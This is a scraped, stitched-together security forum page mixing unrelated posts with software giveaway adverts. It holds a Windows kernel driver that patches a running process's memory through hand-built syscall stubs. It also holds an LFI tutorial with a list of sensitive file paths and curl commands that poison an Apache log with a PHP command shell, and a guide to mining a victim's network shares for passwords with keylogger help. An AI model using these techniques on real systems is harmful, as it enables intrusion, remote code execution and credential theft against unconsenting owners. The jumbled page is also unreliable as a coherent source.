    UNICODE_STRING PsGetProcessImageFileNameStr = {0};
    UNICODE_STRING PsGetProcessSectionBaseAddressStr = {0};

#ifdef _M_IX86
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x8B, 0xFF, 0x55, 0x8B, 0xEC, 0x51, 0x83, 0x65, 0xFC, 0x00,
        0x56, 0x57, 0x64, 0xA1, 0x24, 0x01, 0x00, 0x00, 0x8B, 0xF0,
        0xFF, 0x8E, 0xD4, 0x00, 0x00, 0x00, 0xB9, 0xC0, 0x38, 0x56,
        0x80, 0xE8, 0xB4, 0xEE, 0xF6, 0xFF, 0x8B, 0x45, 0x08, 0x85,
        0xC0
    };
#elif defined(_M_AMD64)
    CONST BYTE PsGetNextProcessSignature[] =
    {
        0x48, 0x89, 0x5C, 0x24, 0x08, 0x48, 0x89, 0x6C, 0x24, 0x10,
        0x48, 0x89, 0x74, 0x24, 0x18, 0x57, 0x41, 0x54, 0x41, 0x55,
        0x41, 0x56, 0x41, 0x57, 0x48, 0x83, 0xEC, 0x20, 0x65, 0x48,
        0x8B, 0x34, 0x25, 0x88, 0x01, 0x00, 0x00, 0x45, 0x33, 0xED,
        0x48, 0x8B, 0xF9, 0x66, 0xFF, 0x8E, 0xC6, 0x01, 0x00, 0x00,
        0x4D, 0x8B, 0xE5, 0x41, 0x8B, 0xED, 0x41, 0x8D, 0x4D, 0x11,
        0x33, 0xC0,
    };
#endif

#ifdef _M_IX86
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x6A, 0x00, 0x55, 0x53, 0x56, 0x57, 0x0F, 0xA0, 0xBB, 0x30,
        0x00, 0x00, 0x00, 0x66, 0x8E, 0xE3, 0x64, 0xFF, 0x35, 0x00,
        0x00, 0x00, 0x00
    };
#elif defined(_M_AMD64)
    CONST BYTE KiSystemServiceSignature[] =
    {
        0x48, 0x83, 0xEC, 0x08, 0x55, 0x48, 0x81, 0xEC, 0x58, 0x01,
        0x00, 0x00, 0x48, 0x8D, 0xAC, 0x24, 0x80, 0x00, 0x00, 0x00,
        0x48, 0x89, 0x9D, 0xC0, 0x00, 0x00, 0x00, 0x48, 0x89, 0xBD,
        0xC8, 0x00, 0x00, 0x00, 0x48, 0x89, 0xB5, 0xD0, 0x00, 0x00,
        0x00, 0xFB, 0x65, 0x48, 0x8B, 0x1C, 0x25, 0x88, 0x01, 0x00,
        0x00
    };
#endif

    RtlInitUnicodeString(&PsGetProcessImageFileNameStr, L"PsGetProcessImageFileName");
    RtlInitUnicodeString(&PsGetProcessSectionBaseAddressStr, L"PsGetProcessSectionBaseAddress");

    PsGetProcessImageFileName = (pPsGetProcessImageFileName)MmGetSystemRoutineAddress(&PsGetProcessImageFileNameStr);
    if(PsGetProcessImageFileName == NULL)
    {
        DbgPrint("- Could not find PsGetProcessImageFileName\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessImageFileName at %p\n", PsGetProcessImageFileName);

    PsGetProcessSectionBaseAddress = (pPsGetProcessSectionBaseAddress)MmGetSystemRoutineAddress(&PsGetProcessSectionBaseAddressStr);
    if(PsGetProcessSectionBaseAddress == NULL)
    {
        DbgPrint("- Could not find PsGetProcessSectionBaseAddress\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetProcessSectionBaseAddress at %p\n", PsGetProcessSectionBaseAddress);

    PsGetNextProcess = (pPsGetNextProcess)FindFunctionInModule(PsGetNextProcessSignature, sizeof(PsGetNextProcessSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(PsGetNextProcess == NULL)
    {
        DbgPrint("- Could not find PsGetNextProcess\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found PsGetNextProcess at %p\n", PsGetNextProcess);

    KiSystemService = (pKiSystemService)FindFunctionInModule(KiSystemServiceSignature, sizeof(KiSystemServiceSignature), KernelInfo->ImageBaseAddress, KernelInfo->ImageSize);
    if(KiSystemService == NULL)
    {
        DbgPrint("- Could not find KiSystemService\n");
        return STATUS_UNSUCCESSFUL;
    }
    DbgPrint("+ Found KiSystemService at %p\n", KiSystemService);

    return STATUS_SUCCESS;
}

VOID OnUnload(IN PDRIVER_OBJECT DriverObject)
{
    DbgPrint("+ Unloading\n");
}
PSYSTEM_MODULE GetKernelModuleInfo(VOID)
{
    PSYSTEM_MODULE SystemModule = NULL;
    PSYSTEM_MODULE FoundModule = NULL;
    ULONG_PTR SystemInfoLength = 0;
    PVOID Buffer = NULL;
    ULONG Count = 0;
    ULONG i = 0;
    ULONG j = 0;
    //Other names for WinXP
    CONST CHAR *KernelNames[] =
    {
        "ntoskrnl.exe", "ntkrnlmp.exe", "ntkrnlpa.exe", "ntkrpamp.exe"
    };

    //Perform error checking on the calls in actual code
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, &SystemInfoLength, 0, &SystemInfoLength);
    Buffer = ExAllocatePool(NonPagedPool, SystemInfoLength);
    (VOID)ZwQuerySystemInformation(SystemModuleInformation, Buffer, SystemInfoLength, NULL);

    Count = ((PSYSTEM_MODULE_INFORMATION)Buffer)->ModulesCount;
    for(i = 0; i < Count; ++i)
    {
        SystemModule = &((PSYSTEM_MODULE_INFORMATION)Buffer)->Modules[i];
        for(j = 0; j < sizeof(KernelNames) / sizeof(KernelNames[0]); ++j)
        {
            if(strstr((LPCSTR)SystemModule->Name, KernelNames[j]) != NULL)
            {
                FoundModule = (PSYSTEM_MODULE)ExAllocatePool(NonPagedPool, sizeof(SYSTEM_MODULE));
                RtlCopyMemory(FoundModule, SystemModule, sizeof(SYSTEM_MODULE));
                ExFreePool(Buffer);
                return FoundModule;
            }
        }
    }
    DbgPrint("Could not find the kernel in module list\n");
    return NULL;
}

PEPROCESS GetEPROCESSFromName(IN CONST CHAR *ImageName)
{
    PEPROCESS ProcessHead = PsGetNextProcess(NULL);
    PEPROCESS Process = PsGetNextProcess(NULL);
    CHAR *ProcessName = NULL;

    do
    {
        ProcessName = PsGetProcessImageFileName(Process);
        DbgPrint("+ Currently looking at %s\n", ProcessName);
        if(strstr(ProcessName, ImageName) != NULL)
        {
            DbgPrint("+ Found the process -- %s\n", ProcessName);
            return Process;
        }
        Process = PsGetNextProcess(Process);
    } while(Process != NULL && Process != ProcessHead);

    DbgPrint("- Could not find %s\n", ProcessName);
    return NULL;
}

HANDLE GetProcessIdFromEPROCESS(PEPROCESS Process)
{
    return PsGetProcessId(Process);
}

HANDLE OpenProcess(IN CONST CHAR *ProcessName, OUT OPTIONAL PEPROCESS *pProcess)
{
    HANDLE ProcessHandle = NULL;
    CLIENT_ID ClientId = {0};
    OBJECT_ATTRIBUTES ObjAttributes = {0};
    PEPROCESS EProcess = GetEPROCESSFromName(ProcessName);
    NTSTATUS Status = STATUS_UNSUCCESSFUL;

    if(EProcess == NULL)
    {
        return NULL;
    }

    InitializeObjectAttributes(&ObjAttributes, NULL, OBJ_KERNEL_HANDLE, NULL, NULL);
    ObjAttributes.ObjectName = NULL;
    ClientId.UniqueProcess = GetProcessIdFromEPROCESS(EProcess);
    ClientId.UniqueThread = NULL;

    Status = ZwOpenProcess(&ProcessHandle, PROCESS_ALL_ACCESS, &ObjAttributes, &ClientId);
    if(!NT_SUCCESS(Status))
    {
        DbgPrint("- Could not open process %s. -- %X\n", ProcessName, Status);
        return NULL;
    }

    if(pProcess != NULL)
    {
        *pProcess = EProcess;
    }
    return ProcessHandle;
}
-- %X\n", ProcessName, Status); return NULL; } if(pProcess != NULL) { *pProcess = EProcess; } return ProcessHandle; } PVOID CreateSyscallWrapper(IN LONG Index, IN SHORT NumParameters) { #ifdef _M_IX86 SIZE_T StubLength = 0x15; PVOID Buffer = ExAllocatePool(NonPagedPool, StubLength); BYTE *SyscallIndex = ((BYTE *)Buffer) + sizeof(BYTE); BYTE *Retn = ((BYTE *)Buffer) + (0x13 * (sizeof(BYTE))); RtlCopyMemory(Buffer, SyscallTemplate, StubLength); NumParameters = NumParameters * sizeof(ULONG_PTR); RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG)); RtlCopyMemory(Retn, &NumParameters, sizeof(SHORT)); return Buffer; #elif defined(_M_AMD64) PVOID Buffer = ExAllocatePool(NonPagedPool, sizeof(SyscallTemplate)); BYTE *NullStubAddress = &NullStub; BYTE *NullStubAddressIndex = ((BYTE *)Buffer) + (14 * sizeof(BYTE)); BYTE *SyscallIndex = ((BYTE *)Buffer) + (24 * sizeof(BYTE)); BYTE *LowBytesIndex = ((BYTE *)Buffer) + (29 * sizeof(BYTE)); BYTE *HighBytesIndex = ((BYTE *)Buffer) + (37 * sizeof(BYTE)); ULONG LowAddressBytes = ((ULONG_PTR)KiSystemService) & 0xFFFFFFFF; ULONG HighAddressBytes = ((ULONG_PTR)KiSystemService >> 32); RtlCopyMemory(Buffer, SyscallTemplate, sizeof(SyscallTemplate)); RtlCopyMemory(NullStubAddressIndex, (PVOID)&NullStubAddress, sizeof(BYTE *)); RtlCopyMemory(SyscallIndex, &Index, sizeof(LONG)); RtlCopyMemory(LowBytesIndex, &LowAddressBytes, sizeof(ULONG)); RtlCopyMemory(HighBytesIndex, &HighAddressBytes, sizeof(ULONG)); return Buffer; #endif } VOID InitializeSyscalls(VOID) { #ifdef _M_IX86 ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x00FD, 1); ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x00CD, 1); ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x0089, 5); ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0115, 5); #elif defined(_M_AMD64) ZwSuspendProcess = (pZwSuspendProcess)CreateSyscallWrapper(0x017A, 1); ZwResumeProcess = (pZwResumeProcess)CreateSyscallWrapper(0x0144, 1); ZwProtectVirtualMemory = (pZwProtectVirtualMemory)CreateSyscallWrapper(0x004D, 5); ZwWriteVirtualMemory = (pZwWriteVirtualMemory)CreateSyscallWrapper(0x0037, 5); #endif } VOID FreeSyscalls(VOID) { ExFreePool(ZwSuspendProcess); ExFreePool(ZwResumeProcess); ExFreePool(ZwProtectVirtualMemory); ExFreePool(ZwWriteVirtualMemory); } PVOID GetProcessBaseAddress(IN PEPROCESS Process) { return PsGetProcessSectionBaseAddress(Process); } NTSTATUS WriteToProcessAddress(IN HANDLE ProcessHandle, IN PVOID BaseAddress, IN BYTE *NewBytes, IN SIZE_T NewBytesSize) { ULONG OldProtections = 0; SIZE_T BytesWritten = 0; SIZE_T NumBytesToProtect = NewBytesSize; NTSTATUS Status = STATUS_UNSUCCESSFUL; //Needs error checking Status = ZwSuspendProcess(ProcessHandle); Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, PAGE_EXECUTE_READWRITE, &OldProtections); Status = ZwWriteVirtualMemory(ProcessHandle, BaseAddress, NewBytes, NewBytesSize, &BytesWritten); Status = ZwProtectVirtualMemory(ProcessHandle, &BaseAddress, &NumBytesToProtect, OldProtections, &OldProtections); Status = ZwResumeProcess(ProcessHandle); return STATUS_SUCCESS; } NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) { PSYSTEM_MODULE KernelInfo = NULL; PEPROCESS Process = NULL; HANDLE ProcessHandle = NULL; PVOID BaseAddress = NULL; BYTE NewBytes[0x100] = {0}; NTSTATUS Status = STATUS_UNSUCCESSFUL; DbgPrint("+ Driver successfully loaded\n"); DriverObject->DriverUnload = OnUnload; KernelInfo = GetKernelModuleInfo(); if(KernelInfo == NULL) { 
DbgPrint("Could not find kernel module\n"); return STATUS_UNSUCCESSFUL; } DbgPrint("+ Found kernel module.\n" "+ Name: %s -- Base address: %p -- Size: %p\n", KernelInfo->Name, KernelInfo->ImageBaseAddress, KernelInfo->ImageSize); if(!NT_SUCCESS(ResolveFunctions(KernelInfo))) { return STATUS_UNSUCCESSFUL; } InitializeSyscalls(); ProcessHandle = OpenProcess("notepad.exe", &Process); if(ProcessHandle == NULL) { return STATUS_UNSUCCESSFUL; } BaseAddress = GetProcessBaseAddress(Process); if(BaseAddress == NULL) { return STATUS_UNSUCCESSFUL; } DbgPrint("Invoking\n"); RtlFillMemory(NewBytes, sizeof(NewBytes), 0x90); (VOID)WriteToProcessAddress(ProcessHandle, BaseAddress, NewBytes, sizeof(NewBytes)); DbgPrint("+ Done\n"); ExFreePool(KernelInfo); FreeSyscalls(); ZwClose(ProcessHandle); return STATUS_SUCCESS; } Source
-
Sticky Password Premium is a password manager with features such as automated login, automatic form filling, and a password generator; it protects your data with industry-standard AES-256 encryption coupled with your master password or biometric authentication (e.g. fingerprint). Sticky Password Premium is available on Windows, Mac, Android and iOS, and you can optionally synchronize your data automatically across all your computers, smartphones, and tablets. If you prefer not to sync data via Sticky Password's cloud-based servers, you can use Sticky Password Premium's local WiFi sync, which syncs your data over your own network and never touches the cloud. Want a longer license? Then get Sticky Password Premium with free lifetime upgrades and never worry about paying yearly fees again!

Sale ends in 1 day 19 hrs 24 mins
Free Sticky Password Premium (100% discount)
-
WinX DVD Copy Pro allows you to copy/back up your DVDs to DVD discs, DVD folders, or ISOs. The copies made by WinX DVD Copy Pro are 1:1, allow playback on your computer, and can be reburned without loss of quality. DRM protection and region locks are bypassed by WinX DVD Copy Pro. This giveaway has no free updates or free tech support, and the program must be installed and registered before the giveaway is over. Get WinX DVD Copy Pro with free lifetime upgrades for free updates, free tech support, and the ability to install/reinstall/register after this giveaway is over.

Sale ends in 1 day 19 hrs 24 mins
Free WinX DVD Copy Pro (100% discount)
-
Often when conducting security assessments it is necessary to go beyond just identifying the vulnerability, reporting it and heading out for a beer. Sometimes, like when conducting a penetration test or when asked by a client to demonstrate business risk, it is necessary to gain command line access to the machine to show the risks associated with having a web user being able to execute commands on that machine. Often this involves getting a shell by some means, but in the case of Local File Inclusion (LFI), simply finding the Apache log location can be enough to start running commands on the system as the Apache service account.

Often I've wasted hours trying all sorts of combinations to find the correct location of the log files by looking up version numbers and identifying operating systems, but being true to the pentester's code, sometimes it's better to be lazy and just automate the damn thing. So what a buddy of mine and I did was to compile a list of common Apache log file locations, and of files that may indicate Apache log locations, across different operating systems. This list is by no means comprehensive, and if the developer or engineer has bothered to spend 5 minutes moving the log file locations, then chances are this list may not help you. Luckily, most people don't bother moving logs, which makes this a great list to work with.

Below is an example of how to use this list to quickly discover the location of the Apache logs after you've located an LFI vulnerability. This tutorial will utilize Burp Suite, one of the better web testing suites available. If you don't have a copy yet, go get it from Burp Suite. The paid version of the software does not have the timing restrictions and is well worth getting to speed up this attack.

To start, copy the contents of this list and save it somewhere you can access through Burp Suite.
/Library/WebServer/Documents/index.php /Library/WebServer/Documents/index.html /apache/logs/access.log /apache/logs/error.log /etc/GeoIP.conf.default /etc/PolicyKit/PolicyKit.conf /etc/X11/xorg.conf /etc/X11/xorg.conf-vesa /etc/X11/xorg.conf-vmware /etc/X11/xorg.conf.BeforeVMwareToolsInstall /etc/X11/xorg.conf.orig /etc/adduser.conf /etc/airoscript.conf /etc/apache2/apache2.conf /etc/apache2/conf.d /etc/apache2/conf.d/charset /etc/apache2/conf.d/security /etc/apache2/envvars /etc/apache2/httpd.conf /etc/apache2/mods-available/autoindex.conf /etc/apache2/mods-available/deflate.conf /etc/apache2/mods-available/dir.conf /etc/apache2/mods-available/mem_cache.conf /etc/apache2/mods-available/mime.conf /etc/apache2/mods-available/proxy.conf /etc/apache2/mods-available/setenvif.conf /etc/apache2/mods-available/ssl.conf /etc/apache2/mods-enabled/alias.conf /etc/apache2/mods-enabled/deflate.conf /etc/apache2/mods-enabled/dir.conf /etc/apache2/mods-enabled/mime.conf /etc/apache2/mods-enabled/negotiation.conf /etc/apache2/mods-enabled/php5.conf /etc/apache2/mods-enabled/status.conf /etc/apache2/ports.conf /etc/apache2/sites-available/default /etc/apache2/sites-enabled/000-default /etc/apt/apt.conf.d /etc/apt/apt.conf.d/00trustcdrom /etc/apt/apt.conf.d/01autoremove /etc/apt/apt.conf.d/01ubuntu /etc/apt/apt.conf.d/05aptitude /etc/apt/apt.conf.d/50unattended-upgrades /etc/apt/apt.conf.d/70debconf /etc/arpalert/arpalert.conf /etc/avahi/avahi-daemon.conf /etc/bash_completion.d/debconf /etc/belocs/locale-gen.conf /etc/bluetooth/input.conf /etc/bluetooth/main.conf /etc/bluetooth/network.conf /etc/bluetooth/rfcomm.conf /etc/bonobo-activation/bonobo-activation-config.xml /etc/ca-certificates.conf /etc/ca-certificates.conf.dpkg-old /etc/casper.conf /etc/chkrootkit.conf /etc/clamav/clamd.conf /etc/clamav/freshclam.conf /etc/conky/conky.conf /etc/console-tools/config.d /etc/console-tools/config.d/splashy /etc/cups/acroread.conf /etc/cups/cupsd.conf /etc/cups/cupsd.conf.default /etc/cups/pdftops.conf /etc/cups/printers.conf /etc/cvs-cron.conf /etc/cvs-pserver.conf /etc/dbus-1/session.conf /etc/dbus-1/system.conf /etc/debconf.conf /etc/defoma/config /etc/defoma/config/x-ttcidfont-conf.conf2 /etc/deluser.conf /etc/depmod.d/ubuntu.conf /etc/dhcp3/dhclient.conf /etc/dhcp3/dhcpd.conf /etc/discover-modprobe.conf /etc/discover.conf.d /etc/discover.conf.d/00discover /etc/dns2tcpd.conf /etc/e2fsck.conf /etc/esound/esd.conf /etc/etter.conf /etc/fonts/conf.d /etc/fonts/conf.d/README /etc/foomatic/filter.conf /etc/foremost.conf /etc/freetds/freetds.conf /etc/fuse.conf /etc/gconf /etc/gconf/2 /etc/gconf/2/evoldap.conf /etc/gconf/2/path /etc/gconf/gconf.xml.defaults /etc/gconf/gconf.xml.defaults/%gconf-tree.xml /etc/gconf/gconf.xml.mandatory /etc/gconf/gconf.xml.mandatory/%gconf-tree.xml /etc/gconf/gconf.xml.system /etc/gdm/failsafeDexconf /etc/gnome-vfs-2.0/modules/default-modules.conf /etc/gnome-vfs-2.0/modules/extra-modules.conf /etc/gre.d/1.9.0.10.system.conf /etc/gre.d/1.9.0.14.system.conf /etc/gre.d/1.9.0.15.system.conf /etc/group /etc/gtk-2.0/im-multipress.conf /etc/hdparm.conf /etc/host.conf /etc/htdig/htdig.conf /etc/httpd/conf/httpd.conf /etc/httpd/httpd.conf /etc/httpd/logs/acces.log /etc/httpd/logs/acces_log /etc/httpd/logs/access.log /etc/httpd/logs/access_log /etc/httpd/logs/error.log /etc/httpd/logs/error_log /etc/httpd/mod_php.conf /etc/inetd.conf /etc/initramfs-tools/conf.d /etc/irssi.conf /etc/java-6-sun/fontconfig.properties /etc/kbd/config /etc/kernel-img.conf /etc/kernel-pkg.conf /etc/ld.so.conf 
/etc/ldap/ldap.conf
/etc/logrotate.conf
/etc/ltrace.conf
/etc/mail/sendmail.conf
/etc/manpath.config
/etc/menu-methods/menu.config
/etc/miredo-server.conf
/etc/miredo.conf
/etc/miredo/miredo-server.conf
/etc/miredo/miredo.conf
/etc/modprobe.d/vmware-tools.conf
/etc/mono/1.0/machine.config
/etc/mono/2.0/machine.config
/etc/mono/2.0/web.config
/etc/mono/config
/etc/mtools.conf
/etc/mysql/conf.d
/etc/mysql/conf.d/old_passwords.cnf
/etc/nsswitch.conf
/etc/oinkmaster.conf
/etc/openvpn/update-resolv-conf
/etc/pam.conf
/etc/passwd
/etc/pear/pear.conf
/etc/php.ini
/etc/php/php.ini
/etc/php5/apache2/conf.d
/etc/php5/apache2/php.ini
/etc/php5/php.ini
/etc/pm/config.d
/etc/pm/config.d/00sleep_module
/etc/postgresql-common/autovacuum.conf
/etc/prelude/default/global.conf
/etc/prelude/default/idmef-client.conf
/etc/prelude/default/tls.conf
/etc/privoxy/config
/etc/proxychains.conf
/etc/pulse/client.conf
/etc/python/debian_config
/etc/reader.conf
/etc/reader.conf.d
/etc/reader.conf.d/0comments
/etc/reader.conf.d/libccidtwin
/etc/reader.conf.old
/etc/remastersys.conf
/etc/resolv.conf
/etc/resolvconf
/etc/resolvconf/update-libc.d
/etc/resolvconf/update-libc.d/sendmail
/etc/rinetd.conf
/etc/samba/dhcp.conf
/etc/samba/smb.conf
/etc/scrollkeeper.conf
/etc/security/access.conf
/etc/security/group.conf
/etc/security/limits.conf
/etc/security/namespace.conf
/etc/security/opasswd
/etc/security/pam_env.conf
/etc/security/sepermit.conf
/etc/security/time.conf
/etc/sensors.conf
/etc/shadow
/etc/skel/.config
/etc/skel/.config/Trolltech.conf
/etc/skel/.config/codef00.com
/etc/skel/.config/menus
/etc/skel/.config/menus/applications-kmenuedit.menu
/etc/skel/.config/user-dirs.dirs
/etc/skel/.config/user-dirs.locale
/etc/skel/.kde3/share/apps/kconf_update
/etc/skel/.kde3/share/apps/kconf_update/log/update.log
/etc/skel/.kde3/share/share/apps/kconf_update
/etc/skel/.kde3/share/share/apps/kconf_update/log
/etc/skel/.kde3/share/share/apps/kconf_update/log/update.log
/etc/smi.conf
/etc/snmp/snmpd.conf
/etc/snort/reference.config
/etc/snort/rules/emerging.conf
/etc/snort/rules/open-test.conf
/etc/snort/snort-mysql.conf
/etc/snort/snort.conf
/etc/snort/threshold.conf
/etc/splashy/config.xml
/etc/ssh/sshd_config
/etc/stunnel/stunnel.conf
/etc/subversion/config
/etc/sysctl.conf
/etc/sysctl.d/10-console-messages.conf
/etc/sysctl.d/10-network-security.conf
/etc/sysctl.d/10-process-security.conf
/etc/sysctl.d/wine.sysctl.conf
/etc/syslog.conf
/etc/tinyproxy/tinyproxy.conf
/etc/tor/tor-tsocks.conf
/etc/tpvmlp.conf
/etc/tsocks.conf
/etc/ucf.conf
/etc/udev/udev.conf
/etc/ufw/sysctl.conf
/etc/ufw/ufw.conf
/etc/uniconf.conf
/etc/unicornscan/modules.conf
/etc/unicornscan/payloads.conf
/etc/unicornscan/unicorn.conf
/etc/updatedb.conf
/etc/updatedb.conf.BeforeVMwareToolsInstall
/etc/vmware-tools/config
/etc/vmware-tools/tpvmlp.conf
/etc/vmware-tools/vmware-tools-libraries.conf
/etc/w3m/config
/etc/wicd/dhclient.conf.template.default
/etc/wicd/manager-settings.conf
/etc/wicd/wired-settings.conf
/etc/wicd/wireless-settings.conf
/etc/xdg/user-dirs.conf
/logs/access.log
/logs/error.log
/private/etc/apache2/extra/httpd-default.conf
/private/etc/apache2/extra/httpd-userdir.conf
/private/etc/apache2/extra/httpd-vhosts.conf
/private/etc/apache2/mime.types
/private/var/log/apache2/access_log
/private/var/log/apache2/error_log
/proc/cpuinfo
/proc/meminfo
/proc/self/cmdline
/proc/self/environ
/proc/self/mounts
/proc/self/stat
/proc/self/status
/proc/version
/share/snmp/snmpd.conf
/srv/www/htdocs/index.html
/usr/bin/php/php.ini
/usr/bin/php5/bin/php.ini
/usr/local/apache/logs/access.log
/usr/local/apache/logs/access_log
/usr/local/apache/logs/error.log
/usr/local/apache/logs/error_log
/usr/local/apache2/conf/extra/httpd-ssl.conf
/usr/local/apache2/conf/httpd.conf
/usr/local/apache2/logs/access_log
/usr/local/apache2/logs/error_log
/usr/local/etc/apache2/httpd.conf
/usr/local/etc/apache22/httpd.conf
/usr/local/www/apache22/data/index.html
/usr/pkg/etc/httpd/httpd.conf
/var/log/access.log
/var/log/access_log
/var/log/apache/access.log
/var/log/apache/access_log
/var/log/apache/error.log
/var/log/apache/error_log
/var/log/apache2/access.log
/var/log/apache2/access_log
/var/log/apache2/error.log
/var/log/apache2/error_log
/var/log/error.log
/var/log/error_log
/var/log/httpd-access.log
/var/log/httpd-error.log
/var/log/httpd/access.log
/var/log/httpd/access_log
/var/log/httpd/error.log
/var/log/httpd/error_log
/var/www/conf/httpd.conf
/var/www/logs/access.log
/var/www/logs/access_log
/var/www/logs/error.log
/var/www/logs/error_log
/wwwroot/php/php.ini

Once you have saved this list somewhere, open up Burp Suite, locate the LFI injection point and send the request to Burp Intruder. In the Burp Intruder window, select the "Positions" tab, mark the position of your LFI injection point and change the attack type to "Sniper". Then, under the "Payloads" tab, load the Apache log list or paste its contents into the payload window.

Start the attack and pay attention to the length column. Apache log files are typically large, so a hit should return a noticeably larger length field. When you find a length that is significantly larger than those of the other requests, look at the response to see if the contents match what an Apache log file would look like. If it does look like a log file and you can see some of your previous traffic in it, you have successfully found the Apache log location and can now use it to inject your PHP code and run commands on the target machine; a minimal sketch of this final step follows after the footnote.

Footnote: this log list is not comprehensive and I will continue to add to it as I find more locations, as well as some Windows folder locations.
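To close the loop, here is a minimal sketch of that final log-poisoning step. It assumes the vulnerable parameter is called page, that the log turned out to live at /var/log/apache2/access.log, and that the server logs the User-Agent header; the target URL and parameter names are placeholders, so adjust everything to your own LFI.

# Hypothetical target; adjust URL, parameter and log path to your engagement.
TARGET="http://victim.example/index.php"

# 1. Poison the access log: the User-Agent string below is written verbatim
#    into access.log, planting a small PHP payload inside the log file.
curl -s -A "<?php system(\$_GET['cmd']); ?>" "$TARGET" > /dev/null

# 2. Include the poisoned log through the LFI and pass a command to the
#    injected PHP via the (also hypothetical) cmd parameter.
curl -s "$TARGET?page=/var/log/apache2/access.log&cmd=id"

If everything lines up, the output of id appears in the response among the raw log entries.

Source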
-
Using perl to grab IP addresses of multiple hostnames
Aerosol posted a topic in Tutoriale in engleza
Recently, while conducting a vulnerability assessment for a rather large customer, I was given a list of hostnames from around 20 domains, culminating in a list of over 5000 targets that needed to go through the motions. Due to the scale of the testing I needed to run the scans from several cloud nodes simultaneously to speed up the scanning. The other thing I needed to do was extract all the IP addresses from the hostnames so as not to scan boxes multiple times when performing port scans, for instance.

I had been playing with Perl for literally a couple of hours and decided to give writing my first Perl script a go, in order to grab all the IP addresses from the list of hosts, which I could then sort and de-duplicate to get the final list of target IPs. I initially played with the idea of running ping commands or nslookups and then regexing the IPs out, but I discovered a fantastic function in Perl called "gethostbyname". After some trial and error I ended up with this little gem, which literally shaved days off the vulnerability assessment (5000+ hostnames ended up being less than 1000 IP addresses).

#!/usr/bin/perl
use Socket;

# Print usage when no hosts file is specified
if ($ARGV[0] eq '') {
    print "\n Usage: ".$0." <hosts_file>\n\n";
    print " e.g: ".$0." hosts.txt\n\n";
    exit;
}

# Open the file containing the list of hostnames
open(FILE, $ARGV[0]) or die "Cannot open ".$ARGV[0]."\n";
@Hosts = <FILE>;
close(FILE);

# Resolve each hostname and print it alongside its IP address
foreach $hostname (@Hosts) {
    chomp($hostname);
    if ($hostname) {
        $ip = gethostbyname($hostname);
        if ($ip) {
            printf "%s\n", $hostname.":".inet_ntoa($ip);
            undef $ip;
        } else {
            # Print 0.0.0.0 for unresolved hostnames
            printf "%s\n", $hostname.":0.0.0.0";
            undef $ip;
        }
    }
}

It works by running the "gethostbyname" function on each hostname and printing the original hostname and IP address separated by a ":" for easy regexing, or for delimited import into Excel. Feel free to change the delimiter if you wish. The other behaviour I added was printing an IP address of "0.0.0.0" whenever a hostname could not be resolved. If you want to import the output into another program you can just append " > output.csv" (a short usage sketch follows below the references).

Credits to: norsec0de

References:
Perl gethostbyname Function
Perl printf Function
PERL -- Predefined Names
Socket - perldoc.perl.org
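As a quick illustration of the sort-and-de-duplicate step mentioned above, here is a minimal sketch, assuming the script was saved as resolve.pl (the filename, like the output.csv name, is just a placeholder):

perl resolve.pl hosts.txt > output.csv

# Keep only the IP column, drop unresolved (0.0.0.0) entries, de-duplicate:
cut -d':' -f2 output.csv | grep -v '^0\.0\.0\.0$' | sort -u > targets.txt

Source
-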
Often while conducting an internal pentest you may gain access to a user machine through some vulnerability or, more commonly, via social engineering. Let's say that you pop a shell, unprivileged, and incognito only finds unprivileged domain tokens. You could move on to another target, or you can try some post-exploitation reconnaissance. A commonly overlooked source of sensitive information is the documents stored on company servers, along with the shares created by staff who think they know enough to share folders with their peers and end up sharing the root of C:. These can be a fantastic source of juicy info if you know how to index and then search through them effectively.

First we need to see what shares your victim has access to. Nmap's NSE will only get you so far, but fortunately Microsoft has its own tool to do this for us and, best of all, it's signed by Microsoft, so using it is seldom an issue. Grab ShareEnum from Sysinternals; it's a self-contained executable that doesn't require any installation. Wait for the vic to take lunch or head home, connect to his desktop and run the tool. If you don't have his password yet, use the Metasploit Lockout Credential Keylogger.

If you're lucky, ShareEnum will get you all the shares for the entire domain; otherwise just use the local subnets to search for the data stores. Make a note of the mapped drives and the UNC paths; these will come in handy later. Once you've exported the data into a text file, use your text editor to pull out the share names and begin creating a mount script for them. Ensure that you mount them all under the same subfolder, e.g. /mnt or /media, so we can configure the indexer to index only these mounts and not waste time indexing your own drive. Run the script to create all the mount points, then create a script to mount the shares and run it (a rough sketch of such a script appears at the end of this post).

Now that the shares are mounted, the indexing tool needs to be installed and configured. A decent indexing tool that I would recommend is called Recoll, which may already be installed in Kali. The benefit of using Recoll over some alternatives is that it can index the usual text and spreadsheet documents as well as inside ZIP archives, including the newer .DOCX, .XLSX and .PPTX formats. It also parses MIME, XML and PDF very well. Installing Recoll on Kali or Ubuntu is pretty simple:

sudo apt-get install recoll

Once you have downloaded the tool, you will need to edit the config file, which by default is stored at ~/.recoll/recoll.conf. I found these settings to be the best time/finding trade-off:

topdirs = path where you mounted the shares
idxflushmb = database store size before flush
skippedNames = files & extensions you don't want indexed (filenames will still be shown, just not contents)
indexedmimetypes = the file types that you want indexed

Once the config file is configured, pipe in the list of files you want indexed with a command such as:

find /mnt -type f -print | recollindex -i

Once the files have been indexed, open up the Recoll GUI and start searching for keywords that will help get you some additional passwords. A list of keywords that worked well:

credit card
ctrl alt del
domain\
id
ident
key
log in
log on
login
logon
net use
net user
pass
passphrase
passwd
password
pin
phrase
pw
pword
secret
ssid
un
uname
user
username
wireless

Here are a couple of screenshots from just a few shares that were available on this local subnet.
